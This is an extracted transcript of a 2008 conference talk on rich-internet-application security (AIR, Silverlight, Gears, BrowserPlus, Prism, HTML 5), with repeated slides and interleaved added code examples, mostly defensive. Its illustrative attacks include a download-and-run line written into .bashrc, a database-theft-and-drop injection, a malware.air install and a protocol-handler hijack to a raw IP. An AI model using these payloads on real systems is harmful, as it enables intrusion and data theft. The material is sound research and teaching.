Ria World Bh 2008

Transcript of Ria World Bh 2008

7/29/2019 Ria World Bh 2008

Living in the RIA World:
Blurring the Line between Web and Desktop Security

Alex Stamos, David Thiel, Justine Osborne
iSEC Partners
August 6, 2008

Outline

Introduction
  Who are we?
  What's a RIA?
  Why use RIA?
Frameworks
  Adobe AIR
  MS Silverlight
  Google Gears
  Y! BrowserPlus
  Mozilla Prism
  HTML 5
Attack Scenarios
  RIA vs OS
  RIA vs the web
  RIA vs RIA

What's a RIA? Rich Internet Applications

As with Web 2.0, ill-defined. May contain some of the following ingredients:
  AJAXy Flashiness
  Local storage
  Offline mode
  Decoupling from the browser
  Access to lower-level OS resources: sockets, hardware devices
  Appearance of a traditional desktop application

Our research has shown a huge disparity in features and security design.


Why use a RIA?

  Web 2.0 no longer gets you VC funding
  To increase responsiveness: distribute data stores between server and client
  Desktop integration: take advantage of OS UI functionality
  Never learned any real programming languages

In short, web developers can now write full desktop apps. This could be good or bad.


RIA Frameworks: Fight!

Adobe AIR


Adobe AIR: Quick Summary

  Runs disconnected
  Standalone app
  Privileged OS access
  Can launch itself
  Local data storage
  Has an installer
  Raw network sockets
  Cross-domain XHR
  Dedicated session management
  Can talk to the calling DOM
  IPC mechanisms
  Proper SSL security


What is Adobe AIR?

So it's just like a Win32 program in the eyes of a security analyst?

Um, not really. The power of AIR is the "I" in RIA:
  Can be invoked by the browser with arguments, like ActiveX or Flash
  Has many native mechanisms for loading external content
  Highly likely that developers will utilize Internet content. That's the point.


What is Adobe AIR? (cont.)

  AIR is best thought of as an ActiveX or Full Trust .NET analogue, not as Flash++
  Code runs with full privileges and can install malware
  Native mechanisms allow interaction with the untrusted world
  Fortunately, Adobe seems to have learned some lessons from ActiveX


Adobe AIR Instantiation

AIR applications are identified by an appID and a pubID. The pubID is calculated from the developer's personal information and certificate.

SWF files can import functionality that allows them to interact with AIR applications. From Adobe:

    airSWFLoader.load(new URLRequest("http://airdownload.adobe.com/browserapi/air.swf"), loaderContext);

With the airSWF classes, the SWF can check on the application's install status and version:

    airSWF.getApplicationVersion(appID, pubID, versionDetectCallback);

Now that we know the version, we can instantiate it:

    airSWF.launchApplication(appID, pubID, arguments);

Note that any SWF the browser loads can do this: an arbitrary page can probe whether a given application is installed and launch it with arguments of the page's choosing, so those arguments arrive in the application as untrusted input.


Adobe AIR Security Model

  By default, code included in an AIR application has full rights
  New functionality in privileged APIs added to JavaScript and ActionScript
  Some restrictions on interacting with the desktop in AIR 1.0
  Existing capabilities can be chained to run native code
  Rumors of additional native code capabilities in future releases


Adobe AIR Security Model (cont.)

  No code access security model as understood on other systems, such as Java or .NET
  Instead, five pre-defined sandboxes with fixed capabilities:
    Application: full permissions. Default for code included with the AIR app
    Remote: code downloaded from the Internet. Browser-like permissions
    Three intermediate permission levels for local SWFs


Adobe AIR Security Model (cont.)

AIR has many ways of loading executable content to run, such as HTML/JS and SWFs. It also has many ways of getting external untrusted data:
  Network traffic
  Arguments from browser invocation
  Command line arguments

Application Sandbox
  Is not supposed to be able to dynamically generate code; eval() is the best example in JS
  Goal is to eliminate the XSS and injection attacks that have plagued Flash apps, which have more kick with local privileges


Adobe AIR Security Model (cont.)

Seems like a reasonable security precaution. How will web developers circumvent it?
  They can look for mistakes in Adobe's classification of methods
  Better yet, use a Sandbox Bridge:
    Official method of moving data between sandboxes
    An application can attach functions or variables to an object available from multiple sandboxes
    Documented as passing by value, not reference, although this doesn't jive with how functions work


Adobe AIR Security Model: Sandbox Bridge

First the parent sets up the Sandbox Bridge:

    var highRightsStuff = {};
    highRightsStuff.writeToFile = function(name, content) {
        // Write to file with air.FileStream
    }
    document.getElementById("child").contentWindow.parentSandboxBridge = highRightsStuff;

Then child code (in an IFRAME) can access the function:

    window.parentSandboxBridge.writeToFile(name, content);
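The point the slide makes about functions not really passing "by value" is easiest to see when the child is hostile. The following is an added Node.js simulation, not code from the slides or from Adobe: the AIR runtime, air.FileStream and the iframe isolation are replaced by plain objects and an in-memory Map, and the storage directory, allowlist and attack payload are constructed assumptions. It runs the same remote-sandbox attack against the bridge as sketched above and against a hardened bridge with the same method name.

```javascript
"use strict";
// Added example (not from the slides or from Adobe): a Node.js simulation of
// the parentSandboxBridge pattern. The AIR runtime, air.FileStream and the
// real iframe isolation are replaced by plain objects and an in-memory Map,
// so this runs offline with `node sandbox_bridge.js`. APP_STORAGE,
// ALLOWED_FILES, fakeDisk and the attack payload are all assumptions.

// Stand-in for whatever air.FileStream would write to disk.
const fakeDisk = new Map();

// Assumed application-storage directory and the only files the app needs.
const APP_STORAGE = "/home/user/.appdata/example-app";
const ALLOWED_FILES = new Set(["notes.txt", "settings.json"]);

// Bridge exactly as sketched on the slide: the function crosses the bridge
// as a callable, so the remote sandbox gets the application sandbox's full
// file-write primitive with arguments of its own choosing.
function buildUnsafeBridge() {
  return {
    writeToFile(name, content) {
      fakeDisk.set(name, String(content)); // no validation of name or content
      return name;
    },
  };
}

// Validate a file name coming from the low-rights side: bare name only,
// no separators, no traversal, no NUL, and it must be on the allowlist.
function safePath(name) {
  if (typeof name !== "string" || name.length === 0 || name.length > 64) return null;
  if (/[\/\\\0]/.test(name) || name === "." || name === "..") return null;
  if (!ALLOWED_FILES.has(name)) return null;
  return APP_STORAGE + "/" + name;
}

// Hardened bridge with the same method name: the exposed function does one
// narrow job, validates every argument, and the object is frozen so child
// code cannot add or swap methods on it.
function buildSafeBridge() {
  return Object.freeze({
    writeToFile(name, content) {
      const full = safePath(name);
      if (full === null) throw new Error("writeToFile: rejected name " + JSON.stringify(name));
      if (typeof content !== "string") throw new Error("writeToFile: content must be a string");
      if (content.length > 64 * 1024) throw new Error("writeToFile: content too large");
      fakeDisk.set(full, content);
      return full;
    },
  });
}

// Simulated child (remote-sandbox) code. In AIR it would run inside the
// iframe and reach the bridge as window.parentSandboxBridge; here the bridge
// object is passed in directly. The arguments are the constructed attack:
// a traversal out of the app directory into a shell start-up file.
function childAttack(parentSandboxBridge) {
  const target = "../../../.bashrc";
  const payload = "curl http://evil.example/x | sh\n"; // constructed payload
  try {
    return { written: parentSandboxBridge.writeToFile(target, payload), error: null };
  } catch (e) {
    return { written: null, error: e.message };
  }
}

// Run the same child code against both bridges and report what hit "disk".
function demo() {
  fakeDisk.clear();
  const unsafe = childAttack(buildUnsafeBridge());
  const safe = childAttack(buildSafeBridge());
  return { unsafe, safe, diskKeys: [...fakeDisk.keys()] };
}

console.log(JSON.stringify(demo(), null, 2));
```

Against the unsafe bridge the traversal path is written verbatim; against the hardened one the call is rejected and nothing reaches the store. The shape carries over to the real platform: expose narrow, argument-validated operations across the bridge rather than generic primitives, and treat every argument that arrives over it as input from the remote sandbox.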


Installing AIR

  AIR requires Flash 9
  Can be installed via an external binary or from inside Flash


Installing an AIR Application

AIR applications can be bundled as binaries (*.air). They can also be installed by a web page from inside a SWF:

    var url:String = "http://www.cybervillains.com/malware.air";
    var runtimeVersion:String = "1.0";
    var arguments:Array = ["launchFromBrowser"];
    airSWF.installApplication(url, runtimeVersion, arguments);

This creates an Open/Save prompt.


Adobe supports signing AIR applications with commercial certificates. This gives you the following prompt:

[Installer prompt for a commercially signed application; screenshot not preserved in the transcript]

Notice the default selection.


Unfortunately, they also support self-signed certificates, which gives you this prompt:

[Installer prompt for a self-signed application; screenshot not preserved in the transcript]


Actually, it looks more like pre-IE7 ActiveX.

What am I complaining about? They give the correct information.
  True, but so did ActiveX
  Allowing users to install signed applets is dangerous enough
  Allowing self-signed (which is the same as unsigned) is terrifying
  The popularity of ActiveX in IE5 and IE6, and the ability of web sites to pop open infinite prompts, made it the premier malware seeding mechanism
  Adobe Flash is more popular than IE ever was
  It's almost impossible to install ActiveX now. That's not an accident.

    Adobe AIRInstalling an AIR Application

    http://find/http://goback/
  • 7/29/2019 Ria World Bh 2008

    55/199

    Living in theRIA World

    Introduction

    Who are we?

    Whats a RIA?

    Why use RIA?

    Frameworks

    Adobe AIR

    MS SilverlightGoogle Gears

    Y! BrowserPlus

    Mozilla Prism

    HTML 5

    AttackScenarios

    RIA vs OS

    RIA vs the web

    RIA vs RIA

    Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

    True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying

    The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

    malware seeding mechanismAdobe Flash is more popular than IE ever was

    Its almost impossible to install ActiveX now. Thats notan accident.

    Adobe AIRInstalling an AIR Application

    http://find/
  • 7/29/2019 Ria World Bh 2008

    56/199

    Living in theRIA World

    Introduction

    Who are we?

    Whats a RIA?

    Why use RIA?

    Frameworks

    Adobe AIR

    MS SilverlightGoogle Gears

    Y! BrowserPlus

    Mozilla Prism

    HTML 5

    AttackScenarios

    RIA vs OS

    RIA vs the web

    RIA vs RIA

    Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

    True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying

    The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

    malware seeding mechanismAdobe Flash is more popular than IE ever was

    Its almost impossible to install ActiveX now. Thats notan accident.



Adobe AIR: Installing an AIR Application

Some suggestions:
Change the default action.
Add a countdown timer to discourage mindless clickthrough.
There is already a registry key to disable unsigned install prompts; turn it on by default.
Stop distributing self-signed AIR applications from Adobe.com.
There is perhaps room for something between AIR and Flash without the rootkit abilities.





Questions about Silverlight

Runs disconnected
Standalone app
Privileged OS access
Can launch itself
Local data storage
Has an installer
Raw network sockets
Cross-domain XHR
Dedicated session management
Can talk to the calling DOM
IPC mechanisms
Proper SSL security

Microsoft Silverlight: What is Silverlight?

Cross-browser plugin comparable in functionality to Flash
Subset of the .NET framework
Two versions:
Silverlight 1.0: released
Silverlight 2.0: beta 2

Microsoft Silverlight: What is Silverlight?

Silverlight Bits
.XAP: .ZIP container for Silverlight apps
XAML: Extensible Application Markup Language
CoreCLR: CLR for .NET lite (simplified CAS)
XBAP: XAML Browser Applications (CAS)
Managed Controls: System.Windows.Forms UserControl subclasses (CAS)

Microsoft Silverlight: XAML

Bigger Cat
Smaller Cat
(the two text strings rendered by the slide's XAML sample; the markup itself is not preserved in the transcript)

Microsoft Silverlight: XAML in Action

Microsoft Silverlight: Silverlight Security Model

Silverlight's simplified Code Access Security:
SecurityTransparent: Silverlight developer code (code sans attribute)
SecuritySafeCritical: new bridge code from Microsoft
SecurityCritical: slimmed .NET 3

Microsoft Silverlight: Silverlight Security Model

This code will fail:

    using System.IO;
    // Direct file system access is SecurityCritical, so transparent
    // application code is refused.
    File.Create("dumpstermuffin.exe");

This code will succeed:

    using System.IO;
    using System.IO.IsolatedStorage;
    // A relative name inside the application's own isolated store.
    IsolatedStorageFile isf = IsolatedStorageFile.GetUserStoreForApplication();
    isf.CreateFile("relativePath");

This code will also fail:

    using System.IO;
    using System.IO.IsolatedStorage;
    // COM3 is a reserved Windows device name, refused even inside the store.
    IsolatedStorageFile isf = IsolatedStorageFile.GetUserStoreForApplication();
    isf.CreateFile("COM3");

Microsoft Silverlight: Isolated Storage

The default storage quota is 1 MB per application
Storage is isolated per AppDomain

Microsoft Silverlight: Isolated Storage

You can deny local storage
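The CreateFile("COM3") call a few slides back is refused because COM3 names the Windows serial port, not a file. The check below is an added example, not Silverlight's code and not from the deck: the name validation a per-application store has to run before it touches the host file system, covering the slide's case plus the other reserved device names and path escapes (a Windows-style host is assumed).

```javascript
// Added example (not from the deck and not Silverlight's implementation):
// the name check a per-application local store should apply before it
// touches the host file system. "COM3" is refused because on Windows it
// names the serial port, with or without an extension and in any case.

const RESERVED_DEVICE_NAMES = new Set([
  'CON', 'PRN', 'AUX', 'NUL',
  ...Array.from({ length: 9 }, (_, i) => `COM${i + 1}`),
  ...Array.from({ length: 9 }, (_, i) => `LPT${i + 1}`),
]);

// Returns null when the name may be used inside the store, otherwise a
// short reason for refusing it. Rules assume a Windows-style host.
function rejectIsolatedStoreName(name) {
  if (typeof name !== 'string' || name.length === 0) return 'empty name';
  // Drive letters and leading separators would leave the store directory.
  if (/^([a-zA-Z]:|[\\/])/.test(name)) return 'absolute path';
  // Control characters and the characters Win32 forbids in file names.
  if (/[\u0000-\u001f<>:"|?*]/.test(name)) return 'forbidden character';
  // Win32 silently strips trailing dots and spaces, so "COM3." is "COM3".
  if (/[. ]$/.test(name)) return 'trailing dot or space';
  for (const seg of name.split(/[\\/]+/)) {
    if (seg === '..') return 'parent directory traversal';
    if (seg === '' || seg === '.') continue;
    // "COM3.txt" still opens the device: compare the part before the first dot.
    const base = seg.split('.')[0].trimEnd().toUpperCase();
    if (RESERVED_DEVICE_NAMES.has(base)) return `reserved device name ${base}`;
  }
  return null;
}

// The yes/no form matching the slide's "will succeed" / "will fail" labels.
function isolatedStoreNameAllowed(name) {
  return rejectIsolatedStoreName(name) === null;
}
```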

Microsoft Silverlight: Network Sockets

TCP socket connections, limited port range 4502-4534
Requires clientaccesspolicy.xml (even to host of origin)

Microsoft Silverlight: Cross-domain and DOM access

Cross-domain access and access to the hosting DOM can be configured by:
clientaccesspolicy.xml and crossdomain.xml
Application manifest
Object parameters passed to the plugin
enableHtmlAccess = false (default setting for cross-domain)
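The two slides above describe one gate: a socket in 4502-4534 or a cross-domain request proceeds only if the target host's clientaccesspolicy.xml allows the caller's origin and grants that port or path. The evaluator below is an added example, not Microsoft's implementation and not from the deck; it parses two constructed policies (a wildcard one and a scoped one), answers the same allow/deny questions the runtime does, and audits the weak settings a reviewer would flag.

```javascript
// Added example (not from the deck and not Microsoft's implementation): an
// evaluator for Silverlight's clientaccesspolicy.xml, the file a client must
// fetch from the target host before it may open a TCP socket or make a
// cross-domain request. Parsing is regex-based and assumes the element shapes
// used in the two constructed sample policies at the bottom.

const SOCKET_PORT_MIN = 4502;   // port range fixed by the Silverlight runtime
const SOCKET_PORT_MAX = 4534;

// One object per <policy>: the origins it allows and what it grants them.
function parseAccessPolicy(xml) {
  const policies = [];
  const policyRe = /<policy>([\s\S]*?)<\/policy>/g;
  let m;
  while ((m = policyRe.exec(xml)) !== null) {
    const body = m[1];
    policies.push({
      domains: [...body.matchAll(/<domain\s+uri="([^"]*)"/g)].map((d) => d[1]),
      resources: [...body.matchAll(/<resource\s+path="([^"]*)"(?:\s+include-subpaths="(true|false)")?/g)]
        .map((r) => ({ path: r[1], includeSubpaths: r[2] === 'true' })),
      sockets: [...body.matchAll(/<socket-resource\s+port="(\d+)(?:-(\d+))?"\s+protocol="tcp"/g)]
        .map((s) => ({ from: Number(s[1]), to: Number(s[2] || s[1]) })),
    });
  }
  return policies;
}

// "*" allows every origin; "http://*.example.com" allows any subdomain.
function originMatches(pattern, origin) {
  if (pattern === '*') return true;
  const re = pattern.replace(/[.+?^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '[^/]+');
  return new RegExp(`^${re}$`).test(origin);
}

// A socket opens only if the port is inside the runtime's range AND a policy
// both allows the caller's origin and grants that port. With no policy file
// (empty list) nothing is allowed, not even a connection back to the origin.
function socketAllowed(policies, origin, port) {
  if (port < SOCKET_PORT_MIN || port > SOCKET_PORT_MAX) return false;
  return policies.some((p) =>
    p.domains.some((d) => originMatches(d, origin)) &&
    p.sockets.some((s) => port >= s.from && port <= s.to));
}

// Cross-domain HTTP: the origin must be allowed and the path granted.
function httpAllowed(policies, origin, path) {
  return policies.some((p) =>
    p.domains.some((d) => originMatches(d, origin)) &&
    p.resources.some((r) => (r.includeSubpaths ? path.startsWith(r.path) : path === r.path)));
}

// What a reviewer flags: wildcard origins and grants covering the whole site.
function auditAccessPolicy(policies) {
  const findings = [];
  policies.forEach((p, i) => {
    if (p.domains.includes('*')) findings.push(`policy ${i}: any origin is allowed`);
    if (p.resources.some((r) => r.path === '/' && r.includeSubpaths)) {
      findings.push(`policy ${i}: whole site granted to cross-domain callers`);
    }
  });
  return findings;
}

// Constructed sample: the copy-paste policy that opens everything ...
const PERMISSIVE_POLICY = `<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
        <socket-resource port="4502-4534" protocol="tcp"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>`;

// ... and a constructed policy scoped to one origin, one API prefix, one port.
const SCOPED_POLICY = `<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from>
        <domain uri="https://app.example.com"/>
      </allow-from>
      <grant-to>
        <resource path="/api/" include-subpaths="true"/>
        <socket-resource port="4502" protocol="tcp"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>`;
```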

Questions about Gears

Runs disconnected
Standalone app
Privileged OS access
Can launch itself
Local data storage
Has an installer
Raw network sockets
Cross-domain XHR
Dedicated session management
Can talk to the calling DOM
IPC mechanisms
Proper SSL security

Google Gears

Uses a homegrown API for synchronizing data
Local SQLite instance used for data storage
LocalServer hosts content locally for offline access
Works offline via SQL database, local assets, and a local app server, LocalServer
LocalServer acts as a broker between the browser and web server
Changes behavior depending on online status
Implements a WorkerPool to perform intensive JavaScript calculations outside of the browser




Google Gears: Security mechanisms

Uses same origin to restrict access to site databases and LocalServer resource capture
Provides for parameterized SQL
Opt-in user dialog
Gears 0.3 allows for customization of this dialog...

Google Gears: Not a great feature...

Google Gears: Workerpool abuse

Workerpools allow intensive tasks that would normally trigger tight-loop detection to run uninterrupted
Due to the ease of tricking users into installing Gears apps, this makes an attractive target for distributed malicious tasks
Applications for hash cracking, remote site attacks



Questions about Yahoo! BrowserPlus

Runs disconnected
Standalone app
Privileged OS access
Can launch itself
Local data storage
Has an installer
Raw network sockets
Cross-domain XHR
Dedicated session management
Can talk to the calling DOM
IPC mechanisms
Proper SSL security

Yahoo! BrowserPlus: A challenger appear

Designed to allow new browser plugins to be easily deployed and updated
To address security, we've followed the same web security precedent set by browser developers.
But it's even worse than that...
Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js
No, you can't do that over SSL



Yahoo! BrowserPlus: Architecture

Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installed on demand, like:
ImageMagick for local image processing
Flickr Uploadr
Notifications via Growl/Snarl
and a Ruby interpreter
These execute code on the local machine as the current user
In short, it's ActiveX







Yahoo! BrowserPlus: About this Ruby business...

Included version: 1.8.6p0
Perfectly safe, as long as you don't use strings or arrays


Yahoo! BrowserPlus: Beating up old ladies

Of course, BrowserPlus isn't totally baked yet
In Sneak Peek phase
Currently, only works with Yahoo! sites
All modules must be signed by Yahoo!
But this has to change before it can be widely adopted
Also lacks some polish...
A description of the componennt oogabooga momma bite me yeah yeah yeah.
Actual Yahoo! content

Yahoo! BrowserPlus: Summary

This is a very dangerous idea.
Allows buggy native code apps of any type to be deployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or control: full privilege.
Corelets are signed, but can overwrite each other after signature verification (and be updated dynamically).
Bad code can supposedly be revoked, but it can override revocation mechanisms.
Bottom line: unsafe at any speed.




    Living in theRIA World

    Yahoo! BrowserPlus

    Summary

    http://find/
  • 7/29/2019 Ria World Bh 2008

    103/199

    Introduction

    Who are we?

    Whats a RIA?

    Why use RIA?

    Frameworks

    Adobe AIR

    MS Silverlight

    Google GearsY! BrowserPlus

    Mozilla Prism

    HTML 5

    AttackScenarios

    RIA vs OS

    RIA vs the web

    RIA vs RIA

    This is a very dangerous idea.

    Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

    All runs as a browser plugin rather than an extension or

    control: full privilege.

    Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

    Bad code can supposedly be revoked, but it can override

    revocation mechanisms.Bottom line unsafe at any speed.

    Living in theRIA World

    Yahoo! BrowserPlus

    Summary

    http://find/
  • 7/29/2019 Ria World Bh 2008

    104/199

    Introduction

    Who are we?

    Whats a RIA?

    Why use RIA?

    Frameworks

    Adobe AIR

    MS Silverlight

    Google GearsY! BrowserPlus

    Mozilla Prism

    HTML 5

    AttackScenarios

    RIA vs OS

    RIA vs the web

    RIA vs RIA

    This is a very dangerous idea.

    Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

    All runs as a browser plugin rather than an extension or

    control: full privilege.

    Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

    Bad code can supposedly be revoked, but it can override

    revocation mechanisms.Bottom line unsafe at any speed.

Mozilla Prism: Quick Summary

Feature checklist (only the labels survived extraction; the slide's per-feature marks did not): Runs disconnected; Standalone app; Privileged OS access; Can launch itself; Local data storage; Has an installer; Raw network sockets; Cross-domain XHR; Dedicated session management; Can talk to the calling DOM; IPC mechanisms; Proper SSL security

Mozilla Prism

Formerly WebRunner: wraps webapps to appear as desktop apps

Standalone browser instance, restricted to one domain

External links open a regular browser

Separate user profile

Certificate errors are a hard failure

Mozilla Prism

Consists of a webapp bundle with id, URI, CSS, scripting and UI rules in an INI:

    [Parameters]
    id=isec.site@isecpartners.com
    uri=https://www.isecpartners.com/
    icon=isec
    status=no
    location=no
    sidebar=no
    navigation=no

Mozilla Prism: Example bundles

(slide body not captured in this transcript)

Mozilla Prism: Bundles

JavaScript included with webapp bundles has full XPCOM privs (but not content scripting privs)

Script in 3rd-party bundles allows modifying browser behavior just like an extension

Unlike add-ons, no mechanism for signing or verifying goodness of webapp bundles


Mozilla Prism: Prism Install UI

(slide body not captured in this transcript)

Mozilla Prism: Abuse

Looks like a bookmark dialog

No warnings for install

Full XPCOM scripting privileges

Low bar for trojans and malicious code: a malicious browser extension, but with no code signing or warning


HTML 5: New features in Firefox and WebKit

The standards-based approach

Introduces DOM storage: sessionStorage and localStorage

  sessionStorage stores arbitrary amounts of data for a single session

  localStorage persists beyond the session: never expires, limited to 5M

Database storage via openDatabase()

All expected to be same-origin


DOM Storage

The major goals of DOM storage: more storage space and real persistence

Cookies considered too small

Users delete cookies, or won't accept them

DOM storage bypasses pesky users

However, pesky users can use:

  about:config: dom.storage.enabled = false

Browser-based SQL Databases: DatabaseJacking

Injection attacks become far more damaging when you can insert code like this:

    var db = openDatabase("e-mail", [], "My precious e-mail", "3.14");
    allmessages = db.executeSql("SELECT * FROM MSGS", [],
        function(results) { sendToAttacker(results); });
    db.executeSql("DROP TABLE MESSAGES", [],
        function() { alert("lol"); });

Firefox 3: Mozilla-specific issues

Cross-Site XMLHttpRequest: removed in late FF3 betas, but it may return

globalStorage

  FF2 has weak same-origin restrictions

  FF2 and FF3 both omit any UI to view/change/delete

  Deprecated in HTML 5 for localStorage

The RIA world is totally SQL-happy

  Downloads, cookies, form history, search history, etc, all stored in local SQLite databases

  Why?? This data isn't relational.


Firefox 3: Additional fun

Speaking of tracking and data storage...

Did you have History turned off? FF3 may have turned it back on.

Also new in FF3:

  nsIdleService: idle tracking through XPCOM

  EXSLT: eXtensible Stylesheet Language Transformations weren't extensible enough, so here are the extensions. Thankfully, XSLT has been bug-free.

Websites can now be protocol handlers: a novel way to implement spyware


Firefox 3: Protocol Handlers

Set up a dumb proxy, forwarding traffic to the real handler IP (and rewriting Host: headers)

Register a new protocol handler thusly:

    navigator.registerProtocolHandler("mailto",
        "http://123.142.120.129:8080/dc/launch?action=compose&To=%s",
        "Yahoo! Mail");

Use your malicious IP instead of a name; users won't know the difference

The only security restriction is that the handler has to go to the domain trying to install it.
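As an added example (not from the slides, and not any browser's own code), here is the check a defender could apply to a registerProtocolHandler() call: it enforces the same-origin rule stated above plus the spec's "%s" and http(s) requirements, then flags the warning signs present in the slide's registration, namely a raw IP host, cleartext http, and a display title that names nothing in the handler host. The warning heuristics and the mail.example.com contrast case are assumptions of this example.

```javascript
// Added example: a defender-side policy check for the arguments of
// navigator.registerProtocolHandler(). Enforces the same-origin rule
// from the slide plus the spec's "%s" and http(s) requirements, then
// adds heuristic warnings (assumptions of this example, not spec rules).
// Runs in Node with the global WHATWG URL class; no browser needed.

const IPV4_LITERAL = /^(\d{1,3}\.){3}\d{1,3}$/;

function isIpLiteral(hostname) {
  // The URL parser keeps IPv6 literals in brackets, e.g. "[::1]".
  return IPV4_LITERAL.test(hostname) || hostname.startsWith("[");
}

function titleTokens(title) {
  // Alphabetic words of three or more letters, lower-cased.
  return title.toLowerCase().split(/[^a-z]+/).filter((t) => t.length >= 3);
}

function evaluateHandlerRegistration(pageOrigin, scheme, template, title) {
  const result = { allowed: false, errors: [], warnings: [] };
  let url;
  try {
    url = new URL(template);
  } catch (e) {
    result.errors.push("handler URL does not parse");
    return result;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    result.errors.push("handler URL must be http or https");
  }
  if (!template.includes("%s")) {
    result.errors.push('handler URL lacks the "%s" placeholder');
  }
  // The same-origin rule from the slide: the handler must go back to the
  // site that is trying to install it.
  if (url.origin !== pageOrigin) {
    result.errors.push(`handler origin ${url.origin} differs from page origin ${pageOrigin}`);
  }
  if (result.errors.length > 0) return result;
  result.allowed = true;

  // Heuristic warnings: the registration is legal, but looks like the slide.
  if (isIpLiteral(url.hostname)) {
    result.warnings.push("handler host is a raw IP literal, not a named site");
  }
  if (url.protocol === "http:") {
    result.warnings.push(`${scheme}: links would be forwarded over cleartext http`);
  }
  const host = url.hostname.toLowerCase();
  const tokens = titleTokens(title);
  if (tokens.length > 0 && !tokens.some((t) => host.includes(t))) {
    result.warnings.push(`title "${title}" names nothing found in handler host ${host}`);
  }
  return result;
}

// Constructed inputs: the slide's registration, issued by a page served from
// the same IP:port (so the same-origin rule passes), and a legitimate-looking
// registration from a hypothetical mail.example.com for contrast.
const SLIDE_EXAMPLE = evaluateHandlerRegistration(
  "http://123.142.120.129:8080",
  "mailto",
  "http://123.142.120.129:8080/dc/launch?action=compose&To=%s",
  "Yahoo! Mail"
);
const LEGIT_EXAMPLE = evaluateHandlerRegistration(
  "https://mail.example.com",
  "mailto",
  "https://mail.example.com/compose?to=%s",
  "Example Mail"
);
// SLIDE_EXAMPLE passes the origin rule with three warnings; LEGIT_EXAMPLE with none.
```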



    Firef